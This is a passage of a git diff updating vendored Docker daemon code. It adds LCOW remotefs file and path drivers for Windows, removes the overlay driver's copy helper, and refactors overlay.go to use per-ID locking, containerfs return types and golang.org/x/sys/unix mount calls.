+		osInfo[i] = &info[i]
+	}
+	return osInfo, nil
+}
+
+func (l *lcowfile) getResponse() ([]byte, error) {
+	hdr, err := remotefs.ReadFileHeader(l.stdout)
+	if err != nil {
+		return nil, err
+	}
+
+	if hdr.Cmd != remotefs.CmdOK {
+		// Something went wrong during the openfile in the server.
+		// Parse stderr and return that as an error
+		eerr, err := remotefs.ReadError(l.stderr)
+		if eerr != nil {
+			return nil, remotefs.ExportedToError(eerr)
+		}
+
+		// Maybe the parsing went wrong?
+		if err != nil {
+			return nil, err
+		}
+
+		// At this point, we know something went wrong in the remotefs program, but
+		// we we don't know why.
+		return nil, fmt.Errorf("unknown error")
+	}
+
+	// Successful command, we might have some data to read (for Read + Seek)
+	buf := make([]byte, hdr.Size, hdr.Size)
+	if _, err := io.ReadFull(l.stdout, buf); err != nil {
+		return nil, err
+	}
+	return buf, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go
new file mode 100644
index 0000000000..f335868af6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go
@@ -0,0 +1,123 @@
+// +build windows
+
+package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow"
+
+import (
+	"bytes"
+	"encoding/json"
+	"os"
+	"strconv"
+
+	"github.com/Microsoft/opengcs/service/gcsutils/remotefs"
+
+	"github.com/containerd/continuity/driver"
+	"github.com/sirupsen/logrus"
+)
+
+var _ driver.Driver = &lcowfs{}
+
+func (l *lcowfs) Readlink(p string) (string, error) {
+	logrus.Debugf("removefs.readlink args: %s", p)
+
+	result := &bytes.Buffer{}
+	if err := l.runRemoteFSProcess(nil, result, remotefs.ReadlinkCmd, p); err != nil {
+		return "", err
+	}
+	return result.String(), nil
+}
+
+func (l *lcowfs) Mkdir(path string, mode os.FileMode) error {
+	return l.mkdir(path, mode, remotefs.MkdirCmd)
+}
+
+func (l *lcowfs) MkdirAll(path string, mode os.FileMode) error {
+	return l.mkdir(path, mode, remotefs.MkdirAllCmd)
+}
+
+func (l *lcowfs) mkdir(path string, mode os.FileMode, cmd string) error {
+	modeStr := strconv.FormatUint(uint64(mode), 8)
+	logrus.Debugf("remotefs.%s args: %s %s", cmd, path, modeStr)
+	return l.runRemoteFSProcess(nil, nil, cmd, path, modeStr)
+}
+
+func (l *lcowfs) Remove(path string) error {
+	return l.remove(path, remotefs.RemoveCmd)
+}
+
+func (l *lcowfs) RemoveAll(path string) error {
+	return l.remove(path, remotefs.RemoveAllCmd)
+}
+
+func (l *lcowfs) remove(path string, cmd string) error {
+	logrus.Debugf("remotefs.%s args: %s", cmd, path)
+	return l.runRemoteFSProcess(nil, nil, cmd, path)
+}
+
+func (l *lcowfs) Link(oldname, newname string) error {
+	return l.link(oldname, newname, remotefs.LinkCmd)
+}
+
+func (l *lcowfs) Symlink(oldname, newname string) error {
+	return l.link(oldname, newname, remotefs.SymlinkCmd)
+}
+
+func (l *lcowfs) link(oldname, newname, cmd string) error {
+	logrus.Debugf("remotefs.%s args: %s %s", cmd, oldname, newname)
+	return l.runRemoteFSProcess(nil, nil, cmd, oldname, newname)
+}
+
+func (l *lcowfs) Lchown(name string, uid, gid int64) error {
+	uidStr := strconv.FormatInt(uid, 10)
+	gidStr := strconv.FormatInt(gid, 10)
+
+	logrus.Debugf("remotefs.lchown args: %s %s %s", name, uidStr, gidStr)
+	return l.runRemoteFSProcess(nil, nil, remotefs.LchownCmd, name, uidStr, gidStr)
+}
+
+// Lchmod changes the mode of an file not following symlinks.
+func (l *lcowfs) Lchmod(path string, mode os.FileMode) error {
+	modeStr := strconv.FormatUint(uint64(mode), 8)
+	logrus.Debugf("remotefs.lchmod args: %s %s", path, modeStr)
+	return l.runRemoteFSProcess(nil, nil, remotefs.LchmodCmd, path, modeStr)
+}
+
+func (l *lcowfs) Mknod(path string, mode os.FileMode, major, minor int) error {
+	modeStr := strconv.FormatUint(uint64(mode), 8)
+	majorStr := strconv.FormatUint(uint64(major), 10)
+	minorStr := strconv.FormatUint(uint64(minor), 10)
+
+	logrus.Debugf("remotefs.mknod args: %s %s %s %s", path, modeStr, majorStr, minorStr)
+	return l.runRemoteFSProcess(nil, nil, remotefs.MknodCmd, path, modeStr, majorStr, minorStr)
+}
+
+func (l *lcowfs) Mkfifo(path string, mode os.FileMode) error {
+	modeStr := strconv.FormatUint(uint64(mode), 8)
+	logrus.Debugf("remotefs.mkfifo args: %s %s", path, modeStr)
+	return l.runRemoteFSProcess(nil, nil, remotefs.MkfifoCmd, path, modeStr)
+}
+
+func (l *lcowfs) Stat(p string) (os.FileInfo, error) {
+	return l.stat(p, remotefs.StatCmd)
+}
+
+func (l *lcowfs) Lstat(p string) (os.FileInfo, error) {
+	return l.stat(p, remotefs.LstatCmd)
+}
+
+func (l *lcowfs) stat(path string, cmd string) (os.FileInfo, error) {
+	logrus.Debugf("remotefs.stat inputs: %s %s", cmd, path)
+
+	output := &bytes.Buffer{}
+	err := l.runRemoteFSProcess(nil, output, cmd, path)
+	if err != nil {
+		return nil, err
+	}
+
+	var fi remotefs.FileInfo
+	if err := json.Unmarshal(output.Bytes(), &fi); err != nil {
+		return nil, err
+	}
+
+	logrus.Debugf("remotefs.stat success. got: %v\n", fi)
+	return &fi, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go
new file mode 100644
index 0000000000..74895b0465
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go
@@ -0,0 +1,212 @@
+// +build windows
+
+package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow"
+
+import (
+	"errors"
+	"os"
+	pathpkg "path"
+	"path/filepath"
+	"sort"
+	"strings"
+
+	"github.com/containerd/continuity/pathdriver"
+)
+
+var _ pathdriver.PathDriver = &lcowfs{}
+
+// Continuity Path functions can be done locally
+func (l *lcowfs) Join(path ...string) string {
+	return pathpkg.Join(path...)
+}
+
+func (l *lcowfs) IsAbs(path string) bool {
+	return pathpkg.IsAbs(path)
+}
+
+func sameWord(a, b string) bool {
+	return a == b
+}
+
+// Implementation taken from the Go standard library
+func (l *lcowfs) Rel(basepath, targpath string) (string, error) {
+	baseVol := ""
+	targVol := ""
+	base := l.Clean(basepath)
+	targ := l.Clean(targpath)
+	if sameWord(targ, base) {
+		return ".", nil
+	}
+	base = base[len(baseVol):]
+	targ = targ[len(targVol):]
+	if base == "." {
+		base = ""
+	}
+	// Can't use IsAbs - `\a` and `a` are both relative in Windows.
+	baseSlashed := len(base) > 0 && base[0] == l.Separator()
+	targSlashed := len(targ) > 0 && targ[0] == l.Separator()
+	if baseSlashed != targSlashed || !sameWord(baseVol, targVol) {
+		return "", errors.New("Rel: can't make " + targpath + " relative to " + basepath)
+	}
+	// Position base[b0:bi] and targ[t0:ti] at the first differing elements.
+	bl := len(base)
+	tl := len(targ)
+	var b0, bi, t0, ti int
+	for {
+		for bi < bl && base[bi] != l.Separator() {
+			bi++
+		}
+		for ti < tl && targ[ti] != l.Separator() {
+			ti++
+		}
+		if !sameWord(targ[t0:ti], base[b0:bi]) {
+			break
+		}
+		if bi < bl {
+			bi++
+		}
+		if ti < tl {
+			ti++
+		}
+		b0 = bi
+		t0 = ti
+	}
+	if base[b0:bi] == ".." {
+		return "", errors.New("Rel: can't make " + targpath + " relative to " + basepath)
+	}
+	if b0 != bl {
+		// Base elements left. Must go up before going down.
+		seps := strings.Count(base[b0:bl], string(l.Separator()))
+		size := 2 + seps*3
+		if tl != t0 {
+			size += 1 + tl - t0
+		}
+		buf := make([]byte, size)
+		n := copy(buf, "..")
+		for i := 0; i < seps; i++ {
+			buf[n] = l.Separator()
+			copy(buf[n+1:], "..")
+			n += 3
+		}
+		if t0 != tl {
+			buf[n] = l.Separator()
+			copy(buf[n+1:], targ[t0:])
+		}
+		return string(buf), nil
+	}
+	return targ[t0:], nil
+}
+
+func (l *lcowfs) Base(path string) string {
+	return pathpkg.Base(path)
+}
+
+func (l *lcowfs) Dir(path string) string {
+	return pathpkg.Dir(path)
+}
+
+func (l *lcowfs) Clean(path string) string {
+	return pathpkg.Clean(path)
+}
+
+func (l *lcowfs) Split(path string) (dir, file string) {
+	return pathpkg.Split(path)
+}
+
+func (l *lcowfs) Separator() byte {
+	return '/'
+}
+
+func (l *lcowfs) Abs(path string) (string, error) {
+	// Abs is supposed to add the current working directory, which is meaningless in lcow.
+	// So, return an error.
+	return "", ErrNotSupported
+}
+
+// Implementation taken from the Go standard library
+func (l *lcowfs) Walk(root string, walkFn filepath.WalkFunc) error {
+	info, err := l.Lstat(root)
+	if err != nil {
+		err = walkFn(root, nil, err)
+	} else {
+		err = l.walk(root, info, walkFn)
+	}
+	if err == filepath.SkipDir {
+		return nil
+	}
+	return err
+}
+
+// walk recursively descends path, calling w.
+func (l *lcowfs) walk(path string, info os.FileInfo, walkFn filepath.WalkFunc) error {
+	err := walkFn(path, info, nil)
+	if err != nil {
+		if info.IsDir() && err == filepath.SkipDir {
+			return nil
+		}
+		return err
+	}
+
+	if !info.IsDir() {
+		return nil
+	}
+
+	names, err := l.readDirNames(path)
+	if err != nil {
+		return walkFn(path, info, err)
+	}
+
+	for _, name := range names {
+		filename := l.Join(path, name)
+		fileInfo, err := l.Lstat(filename)
+		if err != nil {
+			if err := walkFn(filename, fileInfo, err); err != nil && err != filepath.SkipDir {
+				return err
+			}
+		} else {
+			err = l.walk(filename, fileInfo, walkFn)
+			if err != nil {
+				if !fileInfo.IsDir() || err != filepath.SkipDir {
+					return err
+				}
+			}
+		}
+	}
+	return nil
+}
+
+// readDirNames reads the directory named by dirname and returns
+// a sorted list of directory entries.
+func (l *lcowfs) readDirNames(dirname string) ([]string, error) {
+	f, err := l.Open(dirname)
+	if err != nil {
+		return nil, err
+	}
+	files, err := f.Readdir(-1)
+	f.Close()
+	if err != nil {
+		return nil, err
+	}
+
+	names := make([]string, len(files), len(files))
+	for i := range files {
+		names[i] = files[i].Name()
+	}
+
+	sort.Strings(names)
+	return names, nil
+}
+
+// Note that Go's filepath.FromSlash/ToSlash convert between OS paths and '/'. Since the path separator
+// for LCOW (and Unix) is '/', they are no-ops.
+func (l *lcowfs) FromSlash(path string) string {
+	return path
+}
+
+func (l *lcowfs) ToSlash(path string) string {
+	return path
+}
+
+func (l *lcowfs) Match(pattern, name string) (matched bool, err error) {
+	return pathpkg.Match(pattern, name)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go
deleted file mode 100644
index 666a5c0e04..0000000000
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go
+++ /dev/null
@@ -1,174 +0,0 @@
-// +build linux
-
-package overlay
-
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-	"syscall"
-	"time"
-
-	"github.com/docker/docker/pkg/pools"
-	"github.com/docker/docker/pkg/system"
-	rsystem "github.com/opencontainers/runc/libcontainer/system"
-)
-
-type copyFlags int
-
-const (
-	copyHardlink copyFlags = 1 << iota
-)
-
-func copyRegular(srcPath, dstPath string, mode os.FileMode) error {
-	srcFile, err := os.Open(srcPath)
-	if err != nil {
-		return err
-	}
-	defer srcFile.Close()
-
-	dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE, mode)
-	if err != nil {
-		return err
-	}
-	defer dstFile.Close()
-
-	_, err = pools.Copy(dstFile, srcFile)
-
-	return err
-}
-
-func copyXattr(srcPath, dstPath, attr string) error {
-	data, err := system.Lgetxattr(srcPath, attr)
-	if err != nil {
-		return err
-	}
-	if data != nil {
-		if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil {
-			return err
-		}
-	}
-	return nil
-}
-
-func copyDir(srcDir, dstDir string, flags copyFlags) error {
-	err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error {
-		if err != nil {
-			return err
-		}
-
-		// Rebase path
-		relPath, err := filepath.Rel(srcDir, srcPath)
-		if err != nil {
-			return err
-		}
-
-		dstPath := filepath.Join(dstDir, relPath)
-		if err != nil {
-			return err
-		}
-
-		stat, ok := f.Sys().(*syscall.Stat_t)
-		if !ok {
-			return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath)
-		}
-
-		isHardlink := false
-
-		switch f.Mode() & os.ModeType {
-		case 0: // Regular file
-			if flags&copyHardlink != 0 {
-				isHardlink = true
-				if err := os.Link(srcPath, dstPath); err != nil {
-					return err
-				}
-			} else {
-				if err := copyRegular(srcPath, dstPath, f.Mode()); err != nil {
-					return err
-				}
-			}
-
-		case os.ModeDir:
-			if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) {
-				return err
-			}
-
-		case os.ModeSymlink:
-			link, err := os.Readlink(srcPath)
-			if err != nil {
-				return err
-			}
-
-			if err := os.Symlink(link, dstPath); err != nil {
-				return err
-			}
-
-		case os.ModeNamedPipe:
-			fallthrough
-		case os.ModeSocket:
-			if rsystem.RunningInUserNS() {
-				// cannot create a device if running in user namespace
-				return nil
-			}
-			if err := syscall.Mkfifo(dstPath, stat.Mode); err != nil {
-				return err
-			}
-
-		case os.ModeDevice:
-			if err := syscall.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil {
-				return err
-			}
-
-		default:
-			return fmt.Errorf("Unknown file type for %s\n", srcPath)
-		}
-
-		// Everything below is copying metadata from src to dst. All this metadata
-		// already shares an inode for hardlinks.
-		if isHardlink {
-			return nil
-		}
-
-		if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil {
-			return err
-		}
-
-		if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil {
-			return err
-		}
-
-		// We need to copy this attribute if it appears in an overlay upper layer, as
-		// this function is used to copy those. It is set by overlay if a directory
-		// is removed and then re-created and should not inherit anything from the
-		// same dir in the lower dir.
-		if err := copyXattr(srcPath, dstPath, "trusted.overlay.opaque"); err != nil {
-			return err
-		}
-
-		isSymlink := f.Mode()&os.ModeSymlink != 0
-
-		// There is no LChmod, so ignore mode for symlink. Also, this
-		// must happen after chown, as that can modify the file mode
-		if !isSymlink {
-			if err := os.Chmod(dstPath, f.Mode()); err != nil {
-				return err
-			}
-		}
-
-		// system.Chtimes doesn't support a NOFOLLOW flag atm
-		if !isSymlink {
-			aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
-			mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec))
-			if err := system.Chtimes(dstPath, aTime, mTime); err != nil {
-				return err
-			}
-		} else {
-			ts := []syscall.Timespec{stat.Atim, stat.Mtim}
-			if err := system.LUtimesNano(dstPath, ts); err != nil {
-				return err
-			}
-		}
-		return nil
-	})
-	return err
-}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go
index 121b72e2c3..0c2167f083 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package overlay
+package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay"
 
 import (
 	"bufio"
@@ -10,17 +10,24 @@ import (
 	"os"
 	"os/exec"
 	"path"
+	"path/filepath"
 	"strconv"
-	"syscall"
+	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/copy"
 	"github.com/docker/docker/daemon/graphdriver/overlayutils"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/fsutils"
 	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/locker"
 	"github.com/docker/docker/pkg/mount"
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/system"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 // This is a small wrapper over the NaiveDiffWriter that lets us have a custom
@@ -90,6 +97,8 @@ func (d *naiveDiffDriverWithApply) ApplyDiff(id, parent string, diff io.Reader)
 // of that. This means all child images share file (but not directory)
 // data with the parent.
 
+type overlayOptions struct{}
+
 // Driver contains information about the home directory and the list of active mounts that are created using this driver.
 type Driver struct {
 	home          string
@@ -97,6 +106,7 @@ type Driver struct {
 	gidMaps       []idtools.IDMap
 	ctr           *graphdriver.RefCounter
 	supportsDType bool
+	locker        *locker.Locker
 }
 
 func init() {
@@ -104,15 +114,30 @@ func init() {
 }
 
 // Init returns the NaiveDiffDriver, a native diff driver for overlay filesystem.
-// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error.
-// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned.
+// If overlay filesystem is not supported on the host, the error
+// graphdriver.ErrNotSupported is returned.
+// If an overlay filesystem is not supported over an existing filesystem then
+// error graphdriver.ErrIncompatibleFS is returned.
 func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+	_, err := parseOptions(options)
+	if err != nil {
+		return nil, err
+	}
 
 	if err := supportsOverlay(); err != nil {
 		return nil, graphdriver.ErrNotSupported
 	}
 
-	fsMagic, err := graphdriver.GetFSMagic(home)
+	// Perform feature detection on /var/lib/docker/overlay if it's an existing directory.
+	// This covers situations where /var/lib/docker/overlay is a mount, and on a different
+	// filesystem than /var/lib/docker.
+	// If the path does not exist, fall back to using /var/lib/docker for feature detection.
+	testdir := home
+	if _, err := os.Stat(testdir); os.IsNotExist(err) {
+		testdir = filepath.Dir(testdir)
+	}
+
+	fsMagic, err := graphdriver.GetFSMagic(testdir)
 	if err != nil {
 		return nil, err
 	}
@@ -121,31 +146,30 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 	}
 
 	switch fsMagic {
-	case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs, graphdriver.FsMagicEcryptfs:
-		logrus.Errorf("'overlay' is not supported over %s", backingFs)
+	case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs, graphdriver.FsMagicNfsFs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs:
+		logrus.WithField("storage-driver", "overlay").Errorf("'overlay' is not supported over %s", backingFs)
 		return nil, graphdriver.ErrIncompatibleFS
 	}
 
-	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	supportsDType, err := fsutils.SupportsDType(testdir)
 	if err != nil {
 		return nil, err
 	}
-	// Create the driver home dir
-	if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
-		return nil, err
-	}
-
-	if err := mount.MakePrivate(home); err != nil {
-		return nil, err
+	if !supportsDType {
+		if !graphdriver.IsInitialized(home) {
+			return nil, overlayutils.ErrDTypeNotSupported("overlay", backingFs)
+		}
+		// allow running without d_type only for existing setups (#27443)
+		logrus.WithField("storage-driver", "overlay").Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs))
 	}
 
-	supportsDType, err := fsutils.SupportsDType(home)
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
 	if err != nil {
 		return nil, err
 	}
-	if !supportsDType {
-		// not a fatal error until v1.16 (#27443)
-		logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs))
+	// Create the driver home dir
+	if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
+		return nil, err
 	}
 
 	d := &Driver{
@@ -154,11 +178,28 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		gidMaps:       gidMaps,
 		ctr:           graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)),
 		supportsDType: supportsDType,
+		locker:        locker.New(),
 	}
 
 	return NaiveDiffDriverWithApply(d, uidMaps, gidMaps), nil
 }
 
+func parseOptions(options []string) (*overlayOptions, error) {
+	o := &overlayOptions{}
+	for _, option := range options {
+		key, _, err := parsers.ParseKeyValueOpt(option)
+		if err != nil {
+			return nil, err
+		}
+		key = strings.ToLower(key)
+		switch key {
+		default:
+			return nil, fmt.Errorf("overlay: unknown option %s", key)
+		}
+	}
+	return o, nil
+}
+
 func supportsOverlay() error {
 	// We can try to modprobe overlay first before looking at
 	// proc/filesystems for when overlay is supported
@@ -176,7 +217,7 @@ func supportsOverlay() error {
 			return nil
 		}
 	}
-	logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.")
+	logrus.WithField("storage-driver", "overlay").Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.")
 	return graphdriver.ErrNotSupported
 }
 
@@ -193,7 +234,8 @@ func (d *Driver) Status() [][2]string {
 	}
 }
 
-// GetMetadata returns meta data about the overlay driver such as root, LowerDir, UpperDir, WorkDir and MergeDir used to store data.
+// GetMetadata returns metadata about the overlay driver such as root,
+// LowerDir, UpperDir, WorkDir and MergeDir used to store data.
 func (d *Driver) GetMetadata(id string) (map[string]string, error) {
 	dir := d.dir(id)
 	if _, err := os.Stat(dir); err != nil {
@@ -226,7 +268,7 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) {
 // is being shutdown. For now, we just have to unmount the bind mounted
 // we had created.
 func (d *Driver) Cleanup() error {
-	return mount.Unmount(d.home)
+	return mount.RecursiveUnmount(d.home)
 }
 
 // CreateReadWrite creates a layer that is writable for use as a container
@@ -249,10 +291,12 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr
 	if err != nil {
 		return err
 	}
-	if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil {
+	root := idtools.IDPair{UID: rootUID, GID: rootGID}
+
+	if err := idtools.MkdirAllAndChown(path.Dir(dir), 0700, root); err != nil {
 		return err
 	}
-	if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(dir, 0700, root); err != nil {
 		return err
 	}
 
@@ -265,10 +309,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr
 
 	// Toplevel images are just a "root" dir
 	if parent == "" {
-		if err := idtools.MkdirAs(path.Join(dir, "root"), 0755, rootUID, rootGID); err != nil {
-			return err
-		}
-		return nil
+		return idtools.MkdirAndChown(path.Join(dir, "root"), 0755, root)
 	}
 
 	parentDir := d.dir(parent)
@@ -282,19 +323,13 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr
 	parentRoot := path.Join(parentDir, "root")
 
 	if s, err := os.Lstat(parentRoot); err == nil {
-		if err := idtools.MkdirAs(path.Join(dir, "upper"), s.Mode(), rootUID, rootGID); err != nil {
-			return err
-		}
-		if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAndChown(path.Join(dir, "upper"), s.Mode(), root); err != nil {
 			return err
 		}
-		if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil {
 			return err
 		}
-		if err := ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666); err != nil {
-			return err
-		}
-		return nil
+		return ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666)
 	}
 
 	// Otherwise, copy the upper and the lower-id from the parent
@@ -315,17 +350,14 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr
 	}
 
 	upperDir := path.Join(dir, "upper")
-	if err := idtools.MkdirAs(upperDir, s.Mode(), rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(upperDir, s.Mode(), root); err != nil {
 		return err
 	}
-	if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil {
-		return err
-	}
-	if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil {
 		return err
 	}
 
-	return copyDir(parentUpperDir, upperDir, 0)
+	return copy.DirCopy(parentUpperDir, upperDir, copy.Content, true)
 }
 
 func (d *Driver) dir(id string) string {
@@ -334,37 +366,55 @@ func (d *Driver) dir(id string) string {
 
 // Remove cleans the directories that are created for this id.
 func (d *Driver) Remove(id string) error {
-	if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) {
-		return err
+	if id == "" {
+		return fmt.Errorf("refusing to remove the directories: id is empty")
 	}
-	return nil
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
+	return system.EnsureRemoveAll(d.dir(id))
 }
 
 // Get creates and mounts the required file system for the given id and returns the mount path.
-func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
+func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, err error) {
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	dir := d.dir(id)
 	if _, err := os.Stat(dir); err != nil {
-		return "", err
+		return nil, err
 	}
 	// If id has a root, just return it
 	rootDir := path.Join(dir, "root")
 	if _, err := os.Stat(rootDir); err == nil {
-		return rootDir, nil
+		return containerfs.NewLocalContainerFS(rootDir), nil
 	}
+
 	mergedDir := path.Join(dir, "merged")
 	if count := d.ctr.Increment(mergedDir); count > 1 {
-		return mergedDir, nil
+		return containerfs.NewLocalContainerFS(mergedDir), nil
 	}
 	defer func() {
 		if err != nil {
 			if c := d.ctr.Decrement(mergedDir); c <= 0 {
-				syscall.Unmount(mergedDir, 0)
+				if mntErr := unix.Unmount(mergedDir, 0); mntErr != nil {
+					logrus.WithField("storage-driver", "overlay").Debugf("Failed to unmount %s: %v: %v", id, mntErr, err)
+				}
+				// Cleanup the created merged directory; see the comment in Put's rmdir
+				if rmErr := unix.Rmdir(mergedDir); rmErr != nil && !os.IsNotExist(rmErr) {
+					logrus.WithField("storage-driver", "overlay").Warnf("Failed to remove %s: %v: %v", id, rmErr, err)
+				}
 			}
 		}
 	}()
 	lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id"))
 	if err != nil {
-		return "", err
+		return nil, err
+	}
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	if err := idtools.MkdirAndChown(mergedDir, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
+		return nil, err
 	}
 	var (
 		lowerDir = path.Join(d.dir(string(lowerID)), "root")
@@ -372,33 +422,45 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
 		workDir  = path.Join(dir, "work")
 		opts     = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", lowerDir, upperDir, workDir)
 	)
-	if err := syscall.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil {
-		return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err)
+	if err := unix.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil {
+		return nil, fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err)
 	}
 	// chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a
 	// user namespace requires this to move a directory from lower to upper.
-	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
-	if err != nil {
-		return "", err
-	}
 	if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil {
-		return "", err
+		return nil, err
 	}
-	return mergedDir, nil
+	return containerfs.NewLocalContainerFS(mergedDir), nil
 }
 
 // Put unmounts the mount path created for the give id.
+// It also removes the 'merged' directory to force the kernel to unmount the
+// overlay mount in other namespaces.
 func (d *Driver) Put(id string) error {
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	// If id has a root, just return
 	if _, err := os.Stat(path.Join(d.dir(id), "root")); err == nil {
 		return nil
 	}
 	mountpoint := path.Join(d.dir(id), "merged")
+	logger := logrus.WithField("storage-driver", "overlay")
 	if count := d.ctr.Decrement(mountpoint); count > 0 {
 		return nil
 	}
-	if err := syscall.Unmount(mountpoint, 0); err != nil {
-		logrus.Debugf("Failed to unmount %s overlay: %v", id, err)
+	if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil {
+		logger.Debugf("Failed to unmount %s overlay: %v", id, err)
+	}
+
+	// Remove the mountpoint here. Removing the mountpoint (in newer kernels)
+	// will cause all other instances of this mount in other mount namespaces
+	// to be unmounted. This is necessary to avoid cases where an overlay mount
+	// that is present in another namespace will cause subsequent mounts
+	// operations to fail with ebusy.  We ignore any errors here because this may
+	// fail on older kernels which don't have
+	// torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied.
+	if err := unix.Rmdir(mountpoint); err != nil {
+		logger.Debugf("Failed to remove %s overlay: %v", id, err)
 	}
 	return nil
 }
@@ -438,7 +500,7 @@ func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64
 		}
 	}()
 
-	if err = copyDir(parentRootDir, tmpRootDir, copyHardlink); err != nil {
+	if err = copy.DirCopy(parentRootDir, tmpRootDir, copy.Hardlink, true); err != nil {
 		return 0, err
 	}
 
